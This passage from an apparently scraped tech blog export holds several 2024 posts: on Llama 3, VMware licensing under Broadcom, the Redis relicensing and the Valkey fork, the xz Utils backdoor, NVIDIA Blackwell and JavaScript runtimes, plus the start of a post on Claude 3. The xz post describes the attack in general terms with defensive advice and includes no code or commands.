Within hours of the release, the open source community had quantized versions running on consumer hardware via llama.cpp, integrated it into Ollama for easy local deployment, and started fine-tuning experiments.\nThis is the flywheel effect that Meta is betting on. By releasing capable base models, they create an ecosystem of fine-tuned variants, tooling, and applications that collectively advance the state of open AI development. We saw this with Llama 2 — the explosion of fine-tuned models on Hugging Face, the development of efficient inference tools, the emergence of local-first AI applications — and Llama 3 is going to supercharge it.\nMeta also announced that Llama 3 is being integrated into Meta AI across Facebook, Instagram, WhatsApp, and Messenger, powered by a new meta.ai web experience. They\u0026rsquo;re eating their own cooking, which is always a good sign.\nThe Competitive Landscape Shifts # The release of Llama 3 puts pressure on every player in the AI model space. For closed-source providers like OpenAI and Anthropic, the gap between their proprietary models and the best open-weight alternatives just narrowed significantly. The 400B+ model still in training could narrow it further.\nFor other open-weight model providers — Mistral, Cohere, and others — Llama 3 raises the bar dramatically. Mistral\u0026rsquo;s models were the previous benchmark for open-weight performance, and Llama 3 70B surpasses them on most benchmarks.\nGoogle\u0026rsquo;s position is interesting. They have the compute, the data, and the research talent to compete at every level, but their open model releases (Gemma) haven\u0026rsquo;t matched the impact of Llama. With Llama 3 raising expectations, Google will need to respond.\nMy Take # I\u0026rsquo;ve been cautiously optimistic about the trajectory of open-weight AI models, and Llama 3 validates that optimism. 
We\u0026rsquo;re reaching a point where the best freely available models are genuinely useful for production applications, not just research experiments.\nBut I want to temper the excitement with some pragmatism. Model quality is necessary but not sufficient. The real challenges in deploying AI in production are still data quality, evaluation methodology, safety guardrails, and operational reliability. A better base model makes all of those easier but doesn\u0026rsquo;t solve them.\nFor developers looking to get started with Llama 3, my recommendation is simple: download the 8B model, run it locally with Ollama, and start experimenting. Understanding how these models behave — their strengths, their failure modes, their quirks — is becoming essential engineering knowledge. The shift toward open-weight models represents a fundamental change in how the AI ecosystem is developing.\nWe\u0026rsquo;re watching the AI capability curve go open in real time. Whether that turns out to be a democratizing force or creates new problems we haven\u0026rsquo;t anticipated is a question I can\u0026rsquo;t answer today. But I\u0026rsquo;d rather have this technology widely available and well-understood than locked behind API paywalls. Meta, whatever you think of their broader business, is doing something genuinely valuable here.\n","date":"18 April 2024","externalUrl":null,"permalink":"/posts/240418-meta-llama-3-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Meta’s Llama 3 arrives with 8B and 70B parameter models that rival closed-source competitors, reshaping the open-weight AI landscape.","title":"Meta Releases Llama 3 — Open Source AI Just Got Serious","type":"posts"},{"content":"It\u0026rsquo;s been about four months since Broadcom officially closed its $69 billion acquisition of VMware, and the fallout is becoming impossible to ignore. Perpetual licenses? Gone. The sprawling product portfolio? 
Consolidated down to two main bundles — VMware Cloud Foundation (VCF) and VMware vSphere Foundation (VVF). Partner programs? Gutted. And the pricing? Let\u0026rsquo;s just say the forums and Reddit threads are full of infrastructure teams in various stages of grief.\nI\u0026rsquo;ve managed VMware environments on and off since the ESX 3.x days, and I\u0026rsquo;ve never seen this level of anxiety in the virtualization community. Broadcom is executing the exact playbook everyone feared when the acquisition was announced, and it\u0026rsquo;s happening faster than most predicted.\nThe Licensing Earthquake # Let me lay out the key changes that are driving everyone crazy:\nPerpetual licenses are dead. Broadcom has moved everything to subscription-only licensing. If you bought VMware perpetual licenses — some organizations invested millions — you can keep running your current versions, but you won\u0026rsquo;t receive updates, patches, or support once your existing support contracts expire. Broadcom isn\u0026rsquo;t renewing support on perpetual licenses. This is a forced migration to subscriptions, full stop.\nThe portfolio consolidation eliminated standalone products that many organizations relied on. vSphere Standard, the entry-level hypervisor that smaller shops used? Gone. You now need vSphere Foundation at minimum, which bundles in vCenter, Aria operations suite, and Tanzu. VMware Cloud Foundation bundles everything including NSX networking and vSAN storage. There\u0026rsquo;s no à la carte option anymore.\nPricing is\u0026hellip; opaque. Broadcom hasn\u0026rsquo;t published clear public pricing, pushing everything through partner channels. But reports from the field are consistent: many customers are seeing price increases of 2x to 10x compared to their previous agreements. 
Per-core licensing has replaced per-socket licensing, which particularly hurts organizations running high-core-count processors — essentially everyone who bought modern AMD EPYC or Intel Xeon servers.\nThe Channel Partner Apocalypse # Perhaps even more disruptive than the licensing changes is Broadcom\u0026rsquo;s decimation of the VMware partner ecosystem. Thousands of partners have been dropped from the program, with Broadcom consolidating sales through a much smaller number of \u0026ldquo;preferred\u0026rdquo; partners. For many mid-market companies that relied on their local VMware partner for procurement, support, and implementation, this is a practical disaster.\nI\u0026rsquo;ve talked to several colleagues running infrastructure at mid-sized companies, and the story is the same: their existing VMware partner can no longer sell them licenses, the new assigned partner doesn\u0026rsquo;t know their environment, and getting a straight answer on pricing requires escalation after escalation. It\u0026rsquo;s the kind of customer experience that drives migrations.\nThe Great Virtualization Migration Begins # And migrate they are. I\u0026rsquo;m seeing more serious evaluation of VMware alternatives than at any point in the last fifteen years:\nProxmox VE is having a moment. This Debian-based virtualization platform has been around since 2008 but was always seen as a \u0026ldquo;homelab\u0026rdquo; or SMB solution. The recent flood of VMware refugees is changing that perception rapidly. It supports KVM virtual machines and LXC containers, has a decent web interface, and — critically — is open source with optional paid support subscriptions that cost a fraction of VMware pricing.\nNutanix AHV is aggressively courting VMware customers, offering migration tools and competitive pricing. 
For organizations that are already Nutanix HCI customers using VMware as their hypervisor, the switch to the included AHV hypervisor eliminates the VMware cost entirely.\nMicrosoft Hyper-V remains an option, though Microsoft\u0026rsquo;s own recent moves (removing Hyper-V Server as a free standalone product) have dampened enthusiasm somewhat. For Windows-heavy shops already licensed for Windows Server Datacenter, it\u0026rsquo;s still a reasonable path.\nOpenStack and KVM for larger organizations willing to invest in operational complexity for long-term control. Several European cloud providers have run on OpenStack for years and proven it can work at scale.\nThe Broader Lesson: Vendor Lock-in Has a Price # What\u0026rsquo;s happening with VMware is the most vivid illustration of vendor lock-in risk I\u0026rsquo;ve seen in my career. Organizations that built their entire infrastructure on vSphere — using vSAN for storage, NSX for networking, vRealize for management — are now discovering that deep integration with a single vendor\u0026rsquo;s ecosystem comes with a steep exit cost. The deeper you went, the harder it is to leave, and the more pricing leverage the vendor has.\nI\u0026rsquo;ve been preaching infrastructure diversification for years, and I realize that\u0026rsquo;s easy to say and hard to do. VMware earned its dominant position because the product was genuinely excellent, the ecosystem was mature, and the operational model was well-understood. But \u0026ldquo;excellent product\u0026rdquo; and \u0026ldquo;safe long-term bet\u0026rdquo; are different things, and Broadcom just proved it.\nFor organizations starting new infrastructure projects today, I\u0026rsquo;d strongly recommend evaluating open source virtualization platforms and building operational expertise in KVM-based solutions. 
Not because they\u0026rsquo;re better than VMware in every dimension — they\u0026rsquo;re not — but because reducing dependency on any single vendor\u0026rsquo;s licensing decisions is a strategic imperative that this situation has made painfully clear.\nMy Take # Broadcom is doing exactly what Broadcom does. They\u0026rsquo;ve done it with Symantec, CA Technologies, and now VMware. They acquire companies with large installed bases and loyal customers, then optimize aggressively for profit extraction. It\u0026rsquo;s a legitimate business strategy, and the stock market rewards it. But it\u0026rsquo;s corrosive to the technology ecosystem and deeply frustrating for the engineers and organizations caught in the gears.\nIf you\u0026rsquo;re a VMware shop, my advice is simple: start your evaluation of alternatives now, even if you\u0026rsquo;re not ready to migrate. Understanding your options takes time, and you don\u0026rsquo;t want to be making that assessment under duress when your renewal comes up at 5x the previous price. The VMware that existed six months ago — the partner-friendly, ecosystem-building, innovation-driven VMware — isn\u0026rsquo;t coming back.\n","date":"11 April 2024","externalUrl":null,"permalink":"/posts/240411-broadcom-vmware-licensing-shakeup/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Broadcom’s aggressive restructuring of VMware’s licensing and product portfolio is forcing organizations to rethink their virtualization strategies.","title":"Broadcom's VMware Overhaul — The Virtualization World Is Rattled","type":"posts"},{"content":"Redis, the beloved in-memory data store that\u0026rsquo;s become as ubiquitous as oxygen in modern application stacks, just dropped a bombshell. 
As of March 20, all future versions of Redis will be released under a dual license — the Server Side Public License (SSPL) and Redis Source Available License v2 (RSALv2) — instead of the three-clause BSD license that made it one of the most permissively licensed pieces of infrastructure software in existence. And the community\u0026rsquo;s response has been swift: the Linux Foundation is backing a fork called Valkey, and the open source ecosystem is bracing for another licensing war.\nI\u0026rsquo;ve watched this movie before. Multiple times. And the sequel is never better than the original. Elasticsearch went through a similar transformation, switching from open source to a proprietary dual-license model, and the community response followed a predictable pattern.\nWhat Actually Changed # Let me be precise about what happened because the details matter. Redis Labs (now just \u0026ldquo;Redis\u0026rdquo;) changed the license for the Redis server itself. Previously, Redis core was BSD-licensed — you could use it, modify it, redistribute it, embed it in proprietary products, host it as a service, literally anything. The new SSPL/RSALv2 dual license restricts one specific use case: offering Redis as a managed service without contributing back or obtaining a commercial license.\nThe target is obvious. AWS ElastiCache, Google Cloud Memorystore, Azure Cache for Redis — these hyperscalers have built billion-dollar businesses running Redis-compatible services without contributing meaningfully to Redis development (from Redis Labs\u0026rsquo; perspective, anyway). The SSPL, originally created by MongoDB, essentially says: \u0026ldquo;if you offer this software as a service, you must open-source your entire service stack.\u0026rdquo; It\u0026rsquo;s a poison pill for cloud providers.\nRedis CEO Rowan Trollope\u0026rsquo;s blog post frames this as a sustainability move, and I understand the business logic. 
Redis Labs has raised hundreds of millions in venture capital and needs a path to revenue that doesn\u0026rsquo;t involve competing against the very companies using its open source project as a loss leader.\nEnter Valkey # Within days of the license change, the Linux Foundation announced Valkey — a community-driven fork of Redis 7.2.4 (the last BSD-licensed version), backed by AWS, Google Cloud, Oracle, Ericsson, and Snap. The project already has maintainers from multiple companies, including former Redis contributors, and has declared its intent to remain under the BSD license.\nThis is the open source immune system at work. When a widely used project changes its social contract, the community routes around the damage. We saw it with OpenOffice begetting LibreOffice, MySQL leading to MariaDB, and CentOS spawning Rocky Linux and AlmaLinux. The same pattern emerged with the Terraform licensing change, where the community quickly established OpenTofu as a fork that keeps the original MPL 2.0 license. The pattern is so predictable at this point that it should be in every VC\u0026rsquo;s risk assessment for open source companies.\nWhat makes Valkey interesting is the Linux Foundation\u0026rsquo;s involvement from day one. This isn\u0026rsquo;t a scrappy fork maintained by a handful of frustrated developers — it\u0026rsquo;s a well-funded, organizationally backed project with major cloud providers committing engineering resources. AWS alone has a massive incentive to make Valkey succeed; their ElastiCache service depends on Redis compatibility.\nThe Sustainability Paradox # Here\u0026rsquo;s where I get philosophical — and maybe a bit grumpy. I\u0026rsquo;ve been building systems with Redis since 2012. It\u0026rsquo;s genuinely excellent software, and Salvatore Sanfilippo (antirez) deserves enormous credit for creating something that\u0026rsquo;s simultaneously simple, fast, and versatile.
But the fundamental tension in commercial open source has never been resolved.\nThe paradox goes like this: to build a successful open source project, you need to make it as permissive and easy to adopt as possible. But to build a successful business around that project, you eventually need to restrict that same permissiveness. Every company built on an open source core eventually faces this moment. Some handle it gracefully (Red Hat\u0026rsquo;s model worked for decades). Others\u0026hellip; don\u0026rsquo;t.\nRedis Labs\u0026rsquo; frustration is legitimate. They employ many of the Redis core developers. They fund the development of modules, testing infrastructure, and documentation. Watching AWS profit enormously from their work while contributing relatively little back is genuinely unfair. But \u0026ldquo;fair\u0026rdquo; and \u0026ldquo;strategically smart\u0026rdquo; aren\u0026rsquo;t always the same thing.\nWhat This Means for Your Stack # If you\u0026rsquo;re running Redis in production — and statistically, you probably are — here\u0026rsquo;s my practical assessment:\nShort term (next 6 months): Nothing changes. Your existing Redis deployments continue to work. The license change only affects new versions, and there\u0026rsquo;s no immediate need to upgrade.\nMedium term (6-18 months): You need to make a choice. Continue with Redis under the new license (fine for most use cases — the restrictions only apply to service providers), or start evaluating Valkey as a drop-in replacement. Given that Valkey is forked from Redis 7.2.4, compatibility should be nearly perfect initially.\nLong term: This is where it gets murky. Redis and Valkey will diverge. Features will be added to one but not the other. Performance characteristics may differ. The ecosystem will fragment — some client libraries may optimize for Redis, others for Valkey. 
I\u0026rsquo;d recommend watching both projects closely and avoiding deep dependencies on features specific to either.\nMy Take # I\u0026rsquo;m disappointed but not surprised. The VC-funded open source model has a fundamental design flaw: it creates a time bomb where the interests of the company and the community inevitably diverge. Redis held out longer than most, but the pattern is clear.\nMy bet is on Valkey succeeding. Not because it\u0026rsquo;s technically superior — right now it\u0026rsquo;s literally the same code — but because the combination of Linux Foundation governance, multi-cloud backing, and genuine community goodwill is a powerful force. LibreOffice overtook OpenOffice. MariaDB became the default in most Linux distributions. OpenTofu\u0026rsquo;s rapid adoption after HashiCorp\u0026rsquo;s licensing change demonstrated that the fork, when backed by sufficient institutional support, tends to win.\nFor Redis Labs, this license change may solve their cloud provider problem in the short term, but at the cost of community trust that took a decade to build. That\u0026rsquo;s a trade I wouldn\u0026rsquo;t have made.\n","date":"4 April 2024","externalUrl":null,"permalink":"/posts/240404-redis-relicensing-valkey-fork/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Redis Labs switches from BSD to a dual SSPL/RSALv2 license, and the Linux Foundation responds by backing the Valkey fork.","title":"Redis Goes Proprietary, the Community Forks — Enter Valkey","type":"posts"},{"content":"If you haven\u0026rsquo;t heard about CVE-2024-3094 yet, stop what you\u0026rsquo;re doing and pay attention. A backdoor was discovered in xz Utils — specifically in versions 5.6.0 and 5.6.1 of the liblzma library — that would have compromised SSH authentication on virtually every major Linux distribution. This wasn\u0026rsquo;t some amateur script kiddie exploit.
This was a patient, sophisticated, multi-year social engineering attack on the open source supply chain, and it was caught almost by accident.\nThe discovery credit goes to Andres Freund, a Microsoft engineer and PostgreSQL developer, who noticed that SSH logins on his Debian sid system were taking about 500 milliseconds longer than expected. Most of us would have blamed the network. Freund dug deeper and found obfuscated malicious code injected into the xz build process. That kind of curiosity and thoroughness quite literally saved the internet.\nThe Attack: A Masterclass in Social Engineering # What makes this attack so terrifying isn\u0026rsquo;t the technical payload — it\u0026rsquo;s the social engineering that enabled it. The attacker, operating under the pseudonym \u0026ldquo;Jia Tan,\u0026rdquo; spent roughly two years building trust within the xz project. They started with legitimate, helpful contributions in 2022. They gradually took on more maintainer responsibilities as the original maintainer, Lasse Collin, struggled with bandwidth and (reportedly) burnout.\nBy 2024, Jia Tan had enough commit access and trust to insert a carefully obfuscated backdoor into the build system. The malicious code wasn\u0026rsquo;t in the source repository directly — it was hidden in test fixture files and activated through a series of build script modifications that would only trigger during specific packaging conditions. The binary artifacts contained code that hooked into OpenSSH\u0026rsquo;s authentication process via systemd\u0026rsquo;s use of liblzma, effectively allowing the attacker to bypass SSH authentication on affected systems.\nLet me be blunt: this is the most sophisticated supply chain attack I\u0026rsquo;ve ever seen. And I\u0026rsquo;ve been watching these for decades. 
The level of patience, the quality of the legitimate contributions used to build trust, the clever obfuscation — this was almost certainly a state-sponsored operation.\nThe Terrifying Timeline # Here\u0026rsquo;s what keeps me up at night about this. The compromised versions (5.6.0 released February 24, 5.6.1 on March 9) had already made it into several rolling-release and testing distributions:\nFedora 40 and Fedora Rawhide Debian testing and unstable openSUSE Tumbleweed and MicroOS Kali Linux Arch Linux The only reason this didn\u0026rsquo;t reach Ubuntu 24.04 LTS, Debian stable, RHEL, or other production distributions is timing. If this had been discovered even a few weeks later, we\u0026rsquo;d be looking at a compromise of millions of production servers worldwide. The advisory from Red Hat went out with maximum urgency, and rightly so.\nWhat the Backdoor Actually Does # The technical details are still being analyzed by the security community, but here\u0026rsquo;s what we know so far. The malicious code targets the RSA key verification process in OpenSSH — but only on systems where sshd is linked against systemd (which pulls in liblzma). When a specially crafted SSH authentication request is received, the backdoor intercepts the RSA signature verification, checks for a specific attacker-controlled key, and if present, grants access without valid credentials.\nIn effect, anyone holding the attacker\u0026rsquo;s private key could log into any compromised system as root. No password, no legitimate key needed. Just silent, invisible access to critical infrastructure worldwide.\nThe obfuscation techniques were remarkable. The malicious payload was hidden in binary test files (bad-3-corrupt_lzma2.xz and good-large_compressed.lzma), extracted and injected only during the build process, and only when certain conditions were met (building on x86_64 Linux with GCC using specific build flags). 
If you built from the Git source directly, the backdoor wasn\u0026rsquo;t there — it only appeared in the distributed tarballs. Clever, and deeply unsettling.\nThe Open Source Sustainability Crisis # I\u0026rsquo;ve been saying for years that we have a critical sustainability problem in open source, and this incident proves it in the most dramatic way possible. Lasse Collin, the xz maintainer, was effectively a single point of failure for a compression library embedded in the boot chain of every major Linux distribution. He was burned out, accepting help from anyone willing to give it.\nThe attacker exploited this. There were even sock puppet accounts pressuring Collin to hand over maintainer access, posting complaints about slow response times and suggesting Jia Tan as a reliable co-maintainer. This is social engineering at its most insidious — it weaponized the open source community\u0026rsquo;s own culture of volunteerism and trust.\nWe need to have a serious conversation about how critical infrastructure libraries get maintained and funded. The fact that a library used by billions of devices was maintained by essentially one person, unpaid, is not a badge of honor for the open source community. It\u0026rsquo;s a systemic failure.\nMy Take # In thirty years of working with software, this is one of the scariest security incidents I\u0026rsquo;ve witnessed — not because of the damage it caused (it was caught in time) but because of how close it came to succeeding. 
If Andres Freund had been having a busy week, if he\u0026rsquo;d dismissed the latency as network jitter, we might not have caught this for months.\nEvery organization running Linux infrastructure needs to do three things right now:\nVerify your xz version — if you\u0026rsquo;re running 5.6.0 or 5.6.1, downgrade immediately Audit your dependency chains — know which critical libraries your systems depend on and who maintains them Fund open source — if your business depends on open source software (it does), contribute to the sustainability of the projects you rely on This was a wake-up call. Whether we actually wake up remains to be seen.\n","date":"28 March 2024","externalUrl":null,"permalink":"/posts/240328-xz-utils-backdoor-cve-2024-3094/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A sophisticated supply chain attack via the xz Utils compression library was caught just days before reaching stable Linux distributions.","title":"The xz Utils Backdoor — Open Source's Worst Nightmare Almost Came True","type":"posts"},{"content":"NVIDIA\u0026rsquo;s GTC 2024 just wrapped up, and if there\u0026rsquo;s one takeaway it\u0026rsquo;s this: Jensen Huang isn\u0026rsquo;t just selling GPUs anymore — he\u0026rsquo;s selling an entire computing paradigm. The star of the show was the Blackwell B200, NVIDIA\u0026rsquo;s next-generation GPU architecture that promises to make the already-dominant H100 look quaint by comparison. Having watched GPU computing evolve from a niche graphics concern to the backbone of modern AI, I have to say — the numbers this time are genuinely staggering.\nThe Blackwell Architecture: What\u0026rsquo;s Actually New # The B200 is built on a 208 billion transistor design, which NVIDIA claims delivers up to 30x the performance of the H100 for certain AI inference workloads. That\u0026rsquo;s not a typo. 
The key innovation is something NVIDIA calls a \u0026ldquo;second-generation Transformer Engine\u0026rdquo; that operates in a new FP4 precision format, essentially allowing the chip to do more useful work per clock cycle for the transformer architectures that power today\u0026rsquo;s large language models.\nBut the real engineering flex is the GB200 \u0026ldquo;superchip\u0026rdquo; — two B200 GPUs connected to a single Grace CPU via NVLink, creating what is essentially a self-contained AI training node. NVIDIA showed configurations scaling from a single GB200 to a GB200 NVL72, which packs 72 Blackwell GPUs into a single rack-scale system connected by a fifth-generation NVLink network delivering 130TB/s of bandwidth. For context, that\u0026rsquo;s the kind of interconnect speed that makes InfiniBand look like it\u0026rsquo;s running over dial-up.\nThe technical specs are impressive on paper. The question, as always with NVIDIA announcements, is when this silicon actually ships in volume and at what price. The H100 supply constraints of 2023 are still fresh in everyone\u0026rsquo;s memory.\nWhy This Matters Beyond the Hype # I\u0026rsquo;ve been skeptical of the \u0026ldquo;just throw more GPU at it\u0026rdquo; approach to AI scaling, but Blackwell addresses something I find genuinely important: inference cost. Training a model is a one-time expense (well, sort of). Running that model for millions of users 24/7 is what actually breaks your infrastructure budget. NVIDIA\u0026rsquo;s claim that Blackwell can reduce inference cost and energy consumption by up to 25x compared to H100 is, if even partially true, transformative.\nConsider what this means practically. Right now, running a large language model at scale requires a small fortune in GPU rental costs. Companies like OpenAI are reportedly spending hundreds of millions on compute. 
If Blackwell delivers even half of its promised efficiency gains, it could democratize access to large-scale AI inference — or at least make it something a well-funded startup can afford rather than just hyperscalers.\nThe energy angle matters too. I\u0026rsquo;ve been tracking the power consumption of AI workloads with growing concern. A single H100 pulls around 700W. Data centers are already struggling with power density. NVIDIA\u0026rsquo;s pitch that Blackwell does more work per watt is as much about keeping the lights on as it is about performance.\nThe Platform Play # What struck me most about Jensen\u0026rsquo;s keynote wasn\u0026rsquo;t the raw hardware specs — it was how aggressively NVIDIA is positioning itself as an end-to-end platform company. NIM (NVIDIA Inference Microservices), CUDA libraries optimized specifically for Blackwell, partnerships with every major cloud provider for \u0026ldquo;NVIDIA Cloud\u0026rdquo; instances — this is a company that understands the moat isn\u0026rsquo;t just the silicon. It\u0026rsquo;s the software ecosystem that makes the silicon useful.\nI\u0026rsquo;ve seen this playbook before. It\u0026rsquo;s the same strategy that made Intel dominant in the server market for two decades: make the hardware great, but make the software tooling so deeply integrated that switching away is painful. NVIDIA\u0026rsquo;s CUDA lock-in has been debated for years, and Blackwell doubles down on it. Every new architecture brings new CUDA features that have no direct equivalent in AMD\u0026rsquo;s ROCm or Intel\u0026rsquo;s oneAPI.\nFor developers, this is both an opportunity and a concern. The opportunity is clear — Blackwell will enable AI applications that simply aren\u0026rsquo;t feasible on current hardware. The concern is the growing monoculture. 
When one company controls the entire stack from silicon to software framework, the industry is one price increase away from a very uncomfortable reckoning.\nMy Take # After thirty years in this industry, I\u0026rsquo;ve learned to separate genuine technological leaps from marketing events. GTC 2024 felt like the former. The Blackwell architecture isn\u0026rsquo;t just \u0026ldquo;more of the same, but faster\u0026rdquo; — the architectural changes around FP4 precision, the NVLink scaling, and the GB200 superchip design represent real engineering innovation.\nThat said, I have a nagging concern. NVIDIA\u0026rsquo;s dominance in AI compute is now so complete that it\u0026rsquo;s starting to look like a single point of failure for an entire industry. Every major AI company, every cloud provider, every research lab is dependent on one company\u0026rsquo;s product roadmap and supply chain. We\u0026rsquo;ve been here before with other monopolies in tech, and it never ends well for the customers.\nFor now, though, if you\u0026rsquo;re building AI infrastructure, Blackwell is going to be the benchmark everything else gets measured against. Start planning your budgets accordingly — and maybe diversify your compute strategy while you\u0026rsquo;re at it. The best time to reduce vendor dependency was five years ago. The second best time is today.\n","date":"21 March 2024","externalUrl":null,"permalink":"/posts/240321-nvidia-blackwell-gtc-2024/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"NVIDIA unveils the Blackwell B200 GPU at GTC 2024, promising a generational leap in AI training and inference performance.","title":"NVIDIA Blackwell at GTC 2024 — The GPU That Wants to Eat the Data Center","type":"posts"},{"content":"For most of Node.js\u0026rsquo;s existence, the JavaScript server-side runtime landscape was simple: there was Node, and there was everything else (which nobody used). That era is definitively over. 
Bun shipped its 1.0 release last September and has been iterating rapidly since. Deno just released version 1.41 with expanded Node.js compatibility. And Node.js itself, now under active development for version 22, is adopting features at a pace that would have been unthinkable three years ago. For the first time, JavaScript developers have a genuine choice — and competition is making everyone better.\nThe State of Bun # Bun landed with bold claims last year: dramatically faster startup times, a built-in bundler, a built-in test runner, native TypeScript support, and SQLite baked right into the runtime. Six months post-1.0, the picture is more nuanced.\nThe performance claims largely hold up for specific benchmarks. Bun\u0026rsquo;s HTTP server and file I/O operations are measurably faster than Node.js in many scenarios. Startup time is significantly better — Bun can start a process in under 10 milliseconds where Node typically takes 30-50ms. For serverless functions and CLI tools where cold start matters, that\u0026rsquo;s a meaningful difference.\nBut real-world application performance tells a more complex story. Most production web applications are bottlenecked by database queries, external API calls, and business logic — not runtime overhead. When your request spends 200ms waiting for PostgreSQL, the 20ms you save on runtime startup becomes noise.\nWhere Bun genuinely shines is developer experience. Having a bundler, test runner, and package manager built into the runtime eliminates a significant amount of tooling configuration. Running bun test instead of configuring Jest, or bun build instead of setting up webpack/esbuild/rollup, reduces the ceremony of starting a new project. For someone who\u0026rsquo;s spent years wrestling with Node.js toolchain configuration, this is deeply appealing.\nThe compatibility story is Bun\u0026rsquo;s biggest challenge. 
While they\u0026rsquo;ve implemented a large subset of Node.js APIs, edge cases and less common modules still break. If you\u0026rsquo;re running a mature production codebase with dozens of dependencies, migrating to Bun today requires thorough testing and a tolerance for discovering compatibility gaps.\nDeno\u0026rsquo;s Node.js Compatibility Play # Deno has taken a fascinating strategic turn. Ryan Dahl originally created Deno as a \u0026ldquo;do-over\u0026rdquo; for Node.js — fixing the mistakes he felt he\u0026rsquo;d made the first time. It launched with security-first permissions, native TypeScript, URL-based imports, and a deliberate break from Node.js compatibility.\nThat ideological purity didn\u0026rsquo;t win the market. The Node.js ecosystem — millions of npm packages, established patterns, existing codebases — proved to be an overwhelming gravitational force. So Deno pivoted.\nDeno 1.28 added npm compatibility. Each subsequent release has expanded it. As of Deno 1.41, you can import most npm packages directly using npm: specifiers, use package.json for dependency management, and run many Node.js applications with minimal changes. This pragmatic shift acknowledges that npm\u0026rsquo;s ecosystem gravitational pull was too strong for ideological purism.\nWhat Deno retains from its original vision is worth noting:\nSecurity by default: code can\u0026rsquo;t access the filesystem, network, or environment without explicit permission flags. In a world of supply chain attacks, this matters. Built-in formatting and linting: deno fmt and deno lint are available without installing anything. Native TypeScript: no compilation step, no tsconfig juggling. Web standard APIs: Deno implements fetch, Web Streams, and other browser APIs natively, making code more portable between server and browser. 
Deno Deploy, their edge hosting platform, adds another dimension — a Cloudflare Workers competitor that\u0026rsquo;s deeply integrated with the runtime.\nNode.js Is Not Standing Still # Here\u0026rsquo;s what often gets missed in the \u0026ldquo;Node.js killer\u0026rdquo; narratives: Node.js is evolving faster now than at any point in the past five years, and the competition deserves credit for that.\nNode.js 21 (current) and the upcoming Node.js 22 include features that directly address the advantages Bun and Deno claimed:\nBuilt-in test runner: node --test is stable and improving rapidly. It\u0026rsquo;s not as polished as Bun\u0026rsquo;s yet, but it eliminates the Jest dependency for many use cases. Native TypeScript support is being actively discussed, with experimental strip-types proposals in the works. Permission model: Node.js 20 introduced an experimental permission model inspired directly by Deno. It\u0026rsquo;s not default-on like Deno\u0026rsquo;s, but it\u0026rsquo;s there. Performance improvements: V8 engine updates, startup optimizations, and the Maglev compiler are narrowing the performance gap. Single executable applications: Node.js can now compile applications into standalone executables, a feature that Bun and Deno both offered first. Watch mode: node --watch provides built-in file watching, reducing the need for nodemon. The message is clear: Node.js is absorbing the best ideas from its competitors while maintaining the massive ecosystem advantage that keeps it dominant.\nHow to Think About Choosing # After spending time with all three runtimes over the past few months, here\u0026rsquo;s my practical framework:\nChoose Node.js if: you have an existing codebase, need maximum ecosystem compatibility, or are hiring developers who need to be productive immediately. 
It\u0026rsquo;s still the safe choice, and \u0026ldquo;safe\u0026rdquo; isn\u0026rsquo;t a criticism — it means your dependencies work, your deployment pipeline is tested, and Stack Overflow has answers for your questions.\nChoose Bun if: you\u0026rsquo;re starting a new project, value developer experience, and are willing to work around occasional compatibility issues. Bun is particularly compelling for tooling, scripts, and new API projects where you can control the dependency tree.\nChoose Deno if: security is a first-class concern, you want the best TypeScript experience, or you\u0026rsquo;re building for Deno Deploy. The npm compatibility improvements make it viable for a much wider range of projects than a year ago.\nMy Take # I\u0026rsquo;ve been building with Node.js since 2012. It\u0026rsquo;s served me well, and I don\u0026rsquo;t see it going away anytime soon. But I\u0026rsquo;m genuinely excited about the competitive pressure that Bun and Deno are creating.\nThe JavaScript ecosystem\u0026rsquo;s biggest problem has always been tooling fragmentation — the endless churn of build tools, test frameworks, and configuration formats. Both Bun and Deno address this by building more into the runtime itself. Node.js is following suit. The end result, regardless of which runtime wins, is a better developer experience for everyone.\nMy prediction: in two years, all three runtimes will have converged significantly in features. The differentiators will be ecosystem size (Node.js advantage), performance characteristics (Bun advantage), and security model (Deno advantage). And most developers will use whichever one their framework of choice supports best. 
That\u0026rsquo;s competition working exactly as it should.\n","date":"14 March 2024","externalUrl":null,"permalink":"/posts/240314-javascript-runtime-wars-bun-deno-node/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"With Bun 1.0 maturing, Deno pushing Node compatibility, and Node.js evolving faster than ever, the JavaScript runtime landscape is more interesting than it’s been in years.","title":"The JavaScript Runtime Wars — Bun, Deno, and Node.js in 2024","type":"posts"},{"content":"Anthropic released their Claude 3 model family on March 4th, and for the first time, we have a credible challenger to GPT-4 across a wide range of benchmarks. The release comes in three tiers — Haiku (fast and cheap), Sonnet (balanced), and Opus (maximum capability) — and the top-end Opus model outperforms GPT-4 on a majority of standard evaluation benchmarks. After months of incremental updates from various labs, this feels like a genuine step function.\nThe Three-Tier Strategy # What\u0026rsquo;s smart about Anthropic\u0026rsquo;s approach is the explicit tiering. Rather than releasing a single model and hoping it fits every use case, they\u0026rsquo;ve built three distinct options:\nClaude 3 Haiku is designed for near-instant responses at low cost. Anthropic claims it can process a 10K-token research paper with charts and graphs in under three seconds. For high-volume, latency-sensitive applications — think customer support, content classification, or real-time code suggestions — this is the tier you\u0026rsquo;d use.\nClaude 3 Sonnet sits in the middle, offering what Anthropic describes as an \u0026ldquo;ideal balance of intelligence and speed.\u0026rdquo; It\u0026rsquo;s priced at roughly 60-80% less than Opus while still outperforming Claude 2.1 on most benchmarks. For the majority of production workloads, this is probably the sweet spot.\nClaude 3 Opus is the flagship. 
